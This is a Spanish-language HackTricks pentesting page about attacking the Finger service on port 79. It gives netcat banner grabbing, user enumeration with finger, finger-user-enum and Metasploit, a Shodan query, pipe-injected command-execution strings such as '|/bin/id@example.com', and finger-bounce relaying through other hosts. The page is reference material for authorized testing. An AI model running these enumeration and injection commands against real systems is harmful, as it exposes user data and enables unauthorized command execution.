hacktricks/network-services-pentesting/pentesting-finger.md

4 KiB

79 - Pentesting Finger

Aprende hacking en AWS de cero a héroe con htARTE (Experto en Red Team de AWS de HackTricks)!

Otras formas de apoyar a HackTricks:

Información Básica

El programa/servicio Finger se utiliza para obtener detalles sobre los usuarios de computadoras. Normalmente, la información proporcionada incluye el nombre de usuario, nombre completo y, en algunos casos, detalles adicionales. Estos detalles adicionales podrían abarcar la ubicación de la oficina y el número de teléfono (si está disponible), la hora en que el usuario inició sesión, el período de inactividad (tiempo de inactividad), la última vez que el usuario leyó el correo electrónico, y el contenido de los archivos de plan y proyecto del usuario.

Puerto predeterminado: 79

PORT   STATE SERVICE
79/tcp open  finger

Enumeración

Obtención de banners/Conexión básica

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Enumeración de usuarios

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternativamente, puedes usar finger-user-enum de pentestmonkey, algunos ejemplos:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap ejecuta un script para hacer uso de los scripts predeterminados

Metasploit utiliza más trucos que Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Ejecución de comandos

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Rebote de Finger

Utilizar un sistema como relevo de finger

finger user@host@victim
finger @internal@external
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks: